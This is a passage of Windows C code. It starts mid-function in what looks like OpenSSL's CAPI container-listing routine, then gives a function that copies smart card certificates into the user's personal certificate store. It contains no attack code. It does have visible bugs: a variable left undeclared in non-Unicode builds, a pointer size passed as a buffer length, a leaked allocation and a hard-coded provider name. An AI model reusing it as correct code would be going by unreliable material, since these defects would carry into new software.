if (err == ERROR_NO_MORE_ITEMS)
goto done;
CAPIerr(CAPI_F_CAPI_LIST_CONTAINERS, CAPI_R_ENUMCONTAINERS_ERROR);
capi_adderror(err);
goto err;
}
CAPI_trace(ctx, "Container name %s, len=%d, index=%d, flags=%d\n", cname, clen, idx, flags);
if (!cname[0] && (clen == buflen))
{
CAPI_trace(ctx, "Enumerate bug: using workaround\n");
goto done;
}
BIO_printf(out, "%d. %s\n", idx, cname);
}
err:
ret = 0;
done:
if (cname)
OPENSSL_free(cname);
CryptReleaseContext(hprov, 0);
return ret;
}
DWORD ShowCertsDlg(LPCTSTR szProviderName,
LPCTSTR szReaderName /* Can be NULL */
)
{
HCRYPTPROV HMainCryptProv = NULL;
BOOL bStatus = FALSE;
LPTSTR szMainContainerName = NULL;
CHAR szContainerName[1024];
DWORD dwContainerNameLen = sizeof(szContainerName);
DWORD dwErr = 0;
DWORD dwFlags = CRYPT_FIRST;
PCCERT_CONTEXT pContextArray[128];
DWORD dwContextArrayLen = 0;
HCRYPTPROV hProv = NULL;
HCRYPTKEY hKey = NULL;
LPBYTE pbCert = NULL;
DWORD dwCertLen = 0;
PCCERT_CONTEXT pCertContext = NULL;
DWORD pKeySpecs[2] = { AT_KEYEXCHANGE, AT_SIGNATURE};
if (szReaderName)
{
size_t ulNameLen = _tcslen(szReaderName);
szMainContainerName = (LPTSTR) LocalAlloc(0, (ulNameLen + 6) * sizeof(TCHAR));
if (!szMainContainerName)
{
return GetLastError();
}
_stprintf(szMainContainerName, _T("\\\\.\\%s\\"), szReaderName);
}
bStatus = CryptAcquireContext(&HMainCryptProv,szMainContainerName,szProviderName,PROV_RSA_FULL,0);
if (!bStatus)
{
dwErr = GetLastError();
goto end;
}
/* Enumerate all the containers */
while (CryptGetProvParam(HMainCryptProv,PP_ENUMCONTAINERS,(LPBYTE) szContainerName,&dwContainerNameLen,dwFlags) &&(dwContextArrayLen < 128))
{
#ifndef _UNICODE
if (CryptAcquireContext(&hProv,
szContainerName,
szProviderName,
PROV_RSA_FULL,
0))
#else
// convert the container name to unicode
int wLen = MultiByteToWideChar(CP_ACP, 0, szContainerName, -1, NULL, 0);
LPWSTR szWideContainerName = (LPWSTR) LocalAlloc(0, wLen * sizeof(WCHAR));
MultiByteToWideChar(CP_ACP, 0, szContainerName, -1, szWideContainerName, wLen);
// Acquire a context on the current container
if (CryptAcquireContext(&hProv,szWideContainerName,szProviderName,PROV_RSA_FULL,0))
#endif
{
// Loop over all the key specs
for (int i = 0; i < 2; i++)
{
if (CryptGetUserKey(hProv,pKeySpecs[i],&hKey) )
{
if (CryptGetKeyParam(hKey,KP_CERTIFICATE,NULL,&dwCertLen,0))
{
pbCert = (LPBYTE) LocalAlloc(0, dwCertLen);
if (!pbCert)
{
dwErr = GetLastError();
goto end;
}
if (CryptGetKeyParam(hKey,KP_CERTIFICATE,pbCert,&dwCertLen,0))
{
pCertContext = CertCreateCertificateContext(X509_ASN_ENCODING|PKCS_7_ASN_ENCODING, pbCert,dwCertLen);
if (pCertContext)
{
pContextArray[dwContextArrayLen++] = pCertContext;
CRYPT_KEY_PROV_INFO ProvInfo;
ProvInfo.pwszContainerName = szWideContainerName;
ProvInfo.pwszProvName = L"Microsoft Base Smart Card Crypto Provider";
ProvInfo.dwProvType = PROV_RSA_FULL;
ProvInfo.dwFlags = 0;
ProvInfo.dwKeySpec = AT_SIGNATURE;
ProvInfo.cProvParam = 0;
ProvInfo.rgProvParam = NULL;
CertSetCertificateContextProperty(pCertContext,CERT_KEY_PROV_INFO_PROP_ID, 0, &ProvInfo);
HCERTSTORE dest = CertOpenStore(CERT_STORE_PROV_SYSTEM, 0, NULL,
CERT_STORE_OPEN_EXISTING_FLAG | CERT_SYSTEM_STORE_CURRENT_USER,L"My");
if(CertAddCertificateContextToStore(dest, pCertContext,CERT_STORE_ADD_REPLACE_EXISTING, NULL))
{
//char certName[1024];
//LPWSTR certName = (LPWSTR)new wchar_t[1024];
LPTSTR certName;
int cbSize = CertNameToStrW(pCertContext->dwCertEncodingType, &(pCertContext->pCertInfo->Subject),CERT_X500_NAME_STR,NULL,0);
certName = (LPTSTR)malloc(cbSize * sizeof(TCHAR));
if (CertNameToStrW(pCertContext->dwCertEncodingType, &(pCertContext->pCertInfo->Subject),CERT_X500_NAME_STR,certName,sizeof(certName)))
{
}
printf("Installed certificate.");
}
else
printf("Error while adding certificate to store");
}
}
LocalFree(pbCert);
}
CryptDestroyKey(hKey);
hKey = NULL;
}
}
CryptReleaseContext(hProv, 0);
hProv = NULL;
}
#ifdef _UNICODE
LocalFree(szWideContainerName);
#endif
// prepare parameters for the next loop
dwContainerNameLen = sizeof(szContainerName);
dwFlags = 0;
}
if (dwContextArrayLen == 0)
printf("No certificate contexts found on card\n");
end:
while (dwContextArrayLen--)
{
CertFreeCertificateContext(pContextArray[dwContextArrayLen]);
}
if (hKey)
CryptDestroyKey(hKey);
if (hProv)
CryptReleaseContext(hProv, 0);
if (szMainContainerName)
LocalFree(szMainContainerName);
if (HMainCryptProv)
CryptReleaseContext(HMainCryptProv, 0);
return dwErr;
}
